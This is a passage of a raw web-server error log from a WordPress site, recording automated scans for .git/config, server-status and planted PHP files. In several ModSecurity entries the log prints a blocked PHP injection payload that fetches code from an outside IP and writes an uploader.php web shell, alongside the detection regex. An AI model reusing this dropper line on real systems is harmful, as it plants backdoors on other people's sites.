"/wp-admin/css/colors/blue/blue.php"] [unique_id "ZMzvzxirS_DJyZqzjOdjHgAAAM4"], referer: www.google.com [Fri Aug 04 20:48:11.924038 2023] [autoindex:error] [pid 404:tid 140160016512768] [client 52.173.121.138:33448] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Aug 05 03:25:22.354114 2023] [ssl:warn] [pid 10382:tid 140448071403392] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Aug 05 03:25:28.611432 2023] [ssl:warn] [pid 10394:tid 140448071403392] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Aug 05 03:25:28.861975 2023] [ssl:warn] [pid 10394:tid 140448071403392] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Aug 05 03:25:30.348028 2023] [ssl:warn] [pid 10394:tid 140448071403392] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Aug 05 03:25:32.633156 2023] [ssl:warn] [pid 10818:tid 140524480870272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Aug 05 03:25:36.810521 2023] [ssl:warn] [pid 10821:tid 140524480870272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Aug 05 13:04:18.967490 2023] [:error] [pid 10841:tid 140524182812416] [client 41.216.188.147:53420] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/install.php, referer: www.google.com [Sat Aug 05 13:04:42.668226 2023] [:error] [pid 11054:tid 140524031743744] [client 41.216.188.147:53446] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/install.php, referer: www.google.com [Sat Aug 05 13:04:46.863777 2023] [:error] [pid 10843:tid 140524098885376] [client 41.216.188.147:53452] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/my1.php, referer: www.google.com [Sat Aug 05 13:04:50.727792 2023] [:error] [pid 10841:tid 140524107278080] [client 41.216.188.147:53456] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/my1.php, referer: www.google.com [Sat Aug 05 13:05:01.247750 2023] [autoindex:error] [pid 10843:tid 140524073707264] [client 41.216.188.147:53470] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/wordpress/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Sat Aug 05 13:05:08.711067 2023] [autoindex:error] [pid 10842:tid 140524040136448] [client 41.216.188.147:53478] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Sat Aug 05 13:05:10.232206 2023] [:error] [pid 10841:tid 140524216383232] [client 41.216.188.147:53482] PHP Fatal error: Uncaught Error: Call to undefined function load_textdomain() in /home/investig/public_html/wp-admin/includes/admin.php:16, referer: www.google.com [Sat Aug 05 13:05:10.232274 2023] [:error] [pid 10841:tid 140524216383232] [client 41.216.188.147:53482] Stack trace:, referer: www.google.com [Sat Aug 05 13:05:10.232285 2023] [:error] [pid 10841:tid 140524216383232] [client 41.216.188.147:53482] #0 {main}, referer: www.google.com [Sat Aug 05 13:05:10.232344 2023] [:error] [pid 10841:tid 140524216383232] [client 41.216.188.147:53482] thrown in /home/investig/public_html/wp-admin/includes/admin.php on line 16, referer: www.google.com [Sat Aug 05 13:05:21.759991 2023] [:error] [pid 11054:tid 140524132456192] [client 41.216.188.147:53504] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php, referer: www.google.com [Sat Aug 05 15:27:48.051636 2023] [autoindex:error] [pid 10842:tid 140524040136448] [client 52.173.121.103:34108] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Aug 05 23:33:46.875948 2023] [autoindex:error] [pid 10843:tid 140524056921856] [client 103.75.45.122:60124] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php 2023/08/06 00:44:39 [error] 10800#10800: *378095 access forbidden by rule, client: 144.126.198.24, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/08/06 00:44:39 [error] 10800#10800: *378112 access forbidden by rule, client: 68.183.64.176, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2023/08/06 00:44:41 [error] 10799#10799: *378197 access forbidden by rule, client: 139.144.150.26, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2023/08/06 00:44:42 [error] 10800#10800: *378212 access forbidden by rule, client: 165.232.76.155, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/08/06 00:44:43 [error] 10800#10800: *378236 access forbidden by rule, client: 165.22.120.216, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/08/06 00:44:43 [error] 10799#10799: *378254 access forbidden by rule, client: 178.62.3.65, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" [Sun Aug 06 00:44:48.680835 2023] [authz_core:error] [pid 10843:tid 140524048529152] [client 137.184.162.65:36194] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Sun Aug 06 00:44:49.687849 2023] [authz_core:error] [pid 10841:tid 140524073707264] [client 159.65.58.104:36202] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/06 00:44:55 [error] 10800#10800: *378381 access forbidden by rule, client: 137.184.162.65, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Aug 06 00:44:55.672060 2023] [authz_core:error] [pid 10842:tid 140524199597824] [client 161.35.155.246:36244] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Sun Aug 06 00:44:55.743809 2023] [authz_core:error] [pid 10842:tid 140524216383232] [client 165.232.76.155:36246] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/08/06 00:44:55 [error] 10800#10800: *378386 access forbidden by rule, client: 159.65.58.104, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/08/06 00:45:02 [error] 10800#10800: *378439 access forbidden by rule, client: 165.232.76.155, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/08/06 00:45:02 [error] 10800#10800: *378440 access forbidden by rule, client: 161.35.155.246, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sun Aug 06 05:01:31.908769 2023] [autoindex:error] [pid 7317:tid 140269336917760] [client 41.216.188.164:50564] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Sun Aug 06 11:25:57.604321 2023] [:error] [pid 7994:tid 140269278168832] [client 179.43.191.18:42896] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Aug 06 12:03:12.810398 2023] [:error] [pid 7317:tid 140269430814464] [client 159.65.125.138:44550] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-activate.php [Sun Aug 06 12:12:43.790217 2023] [autoindex:error] [pid 7318:tid 140269336917760] [client 20.168.223.219:44956] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Aug 07 06:58:55.592320 2023] [autoindex:error] [pid 28740:tid 139721963452160] [client 20.117.135.229:50854] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Aug 07 16:56:43.460407 2023] [autoindex:error] [pid 30221:tid 139721879525120] [client 192.185.82.142:33672] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/index.php [Mon Aug 07 23:57:01.856899 2023] [:error] [pid 11310:tid 139721854347008] [client 81.94.159.31:36616] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/content.php [Tue Aug 08 05:34:12.002835 2023] [autoindex:error] [pid 30839:tid 140224910784256] [client 74.235.222.113:37468] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Tue Aug 08 05:35:21.127531 2023] [autoindex:error] [pid 30747:tid 140225142089472] [client 74.235.222.113:37592] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Tue Aug 08 05:35:30.383632 2023] [:error] [pid 30839:tid 140224986318592] [client 74.235.222.113:37616] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php, referer: www.google.com [Tue Aug 08 05:35:31.686116 2023] [:error] [pid 30839:tid 140224893998848] [client 74.235.222.113:37620] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php, referer: www.google.com [Tue Aug 08 05:35:33.111058 2023] [:error] [pid 30839:tid 140224977925888] [client 74.235.222.113:37624] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php, referer: www.google.com [Tue Aug 08 05:35:40.818737 2023] [:error] [pid 30745:tid 140224902391552] [client 74.235.222.113:37638] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/license.php, referer: www.google.com [Tue Aug 08 13:14:33.824135 2023] [autoindex:error] [pid 18900:tid 140224919176960] [client 23.94.150.194:32986] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/tag-cloud/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/blocks/tag-cloud/index.php [Tue Aug 08 13:50:34.942759 2023] [autoindex:error] [pid 18737:tid 140224927569664] [client 20.163.239.214:35132] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Aug 08 16:06:12.344367 2023] [autoindex:error] [pid 30747:tid 140225019889408] [client 20.150.218.44:43482] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Aug 08 16:58:34.409716 2023] [autoindex:error] [pid 30747:tid 140224944355072] [client 74.249.215.234:46590] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2023/08/08 19:57:17 [error] 30688#30688: *549121 access forbidden by rule, client: 164.92.155.72, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2023/08/08 19:57:17 [error] 30687#30687: *549124 access forbidden by rule, client: 164.92.155.72, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Wed Aug 09 00:30:17.057755 2023] [:error] [pid 30745:tid 140224994711296] [client 20.127.127.235:41170] [client 20.127.127.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZNMkaQe4_iq0MCrjOGQ74wAAAAk"], referer: www.google.com [Wed Aug 09 03:31:17.801978 2023] [autoindex:error] [pid 30839:tid 140224952747776] [client 20.150.218.44:50704] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Aug 09 04:30:28.980467 2023] [autoindex:error] [pid 6926:tid 140719043831552] [client 74.249.215.234:54252] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Aug 09 07:18:56.396963 2023] [:error] [pid 6926:tid 140718941128448] [client 40.117.60.43:36626] [client 40.117.60.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZNOEMPSEU0F_qrpWg1LdFgAAAEk"], referer: www.google.com [Wed Aug 09 10:34:47.958372 2023] [:error] [pid 26184:tid 140719043831552] [client 41.216.188.162:53512] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/install.php, referer: www.google.com [Wed Aug 09 10:34:54.136928 2023] [:error] [pid 7138:tid 140718899164928] [client 41.216.188.162:53526] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/my1.php, referer: www.google.com [Wed Aug 09 10:35:00.821854 2023] [autoindex:error] [pid 26183:tid 140719060616960] [client 41.216.188.162:53544] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/wordpress/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Wed Aug 09 10:35:11.041418 2023] [autoindex:error] [pid 26183:tid 140718915950336] [client 41.216.188.162:53554] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: www.google.com [Wed Aug 09 10:35:27.968261 2023] [:error] [pid 7138:tid 140718865594112] [client 41.216.188.162:53588] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php, referer: www.google.com 2023/08/09 15:02:26 [error] 6884#6884: *600443 access forbidden by rule, client: 18.117.216.74, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Wed Aug 09 16:37:12.085910 2023] [:error] [pid 6927:tid 140718815237888] [client 20.219.1.99:50292] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Wed Aug 09 16:37:26.632961 2023] [:error] [pid 6927:tid 140718924343040] [client 20.219.1.99:50318] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php 2023/08/09 17:21:37 [error] 6885#6885: *607270 access forbidden by rule, client: 18.117.216.74, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/08/09 17:24:14 [error] 6884#6884: *607381 access forbidden by rule, client: 18.117.216.74, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/08/09 20:09:13 [error] 6885#6885: *614803 access forbidden by rule, client: 18.117.216.74, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2023/08/09 20:59:30 [error] 21829#21829: *616707 access forbidden by rule, client: 18.117.216.74, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Aug 10 03:07:44.465903 2023] [:error] [pid 21835:tid 140718899164928] [client 74.249.215.227:37424] [client 74.249.215.227] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZNSa0MrGW5JZ1_vUtk2IVAAAAM4"], referer: www.google.com [Thu Aug 10 03:37:34.977289 2023] [:error] [pid 21835:tid 140718899164928] [client 20.243.147.65:38730] [client 20.243.147.65] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZNShzsrGW5JZ1_vUtk2JVgAAAM4"], referer: www.google.com [Thu Aug 10 04:29:51.337801 2023] [:error] [pid 7002:tid 139979158124288] [client 172.232.13.170:40958] [client 172.232.13.170] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\\\$_(?:(?:pos|ge)t|session))\\\\b" at ARGS:vz. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "233"] [id "958976"] [rev "2"] [msg "PHP Injection Attack"] [data "Matched Data: fwrite found within ARGS:vz: $x=fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/wp-admin/css/colors/blue/uploader.php','w+'),file_get_contents('http://51.79.124.111/vz.txt'));echo \\x22aDriv4\\x22.$x;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-admin/css/colors/blue/blue.php"] [unique_id "ZNSuD3ZHnKMpdB0vRP_LSwAAANE"], referer: www.google.com [Thu Aug 10 08:38:54.391770 2023] [autoindex:error] [pid 6790:tid 139979107768064] [client 141.94.87.67:52322] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/compat3x/css/index.php [Thu Aug 10 08:45:22.412925 2023] [autoindex:error] [pid 7002:tid 139979116160768] [client 162.241.60.174:52728] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/compat3x/css/index.php [Thu Aug 10 11:58:00.445845 2023] [autoindex:error] [pid 7002:tid 139979124553472] [client 172.174.9.21:34216] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com//wp-admin/css/colors/coffee/index.php [Thu Aug 10 17:10:48.946397 2023] [autoindex:error] [pid 6792:tid 139979107768064] [client 20.163.239.214:47930] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Aug 10 17:23:55.733571 2023] [autoindex:error] [pid 7002:tid 139979107768064] [client 104.46.110.117:48916] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex 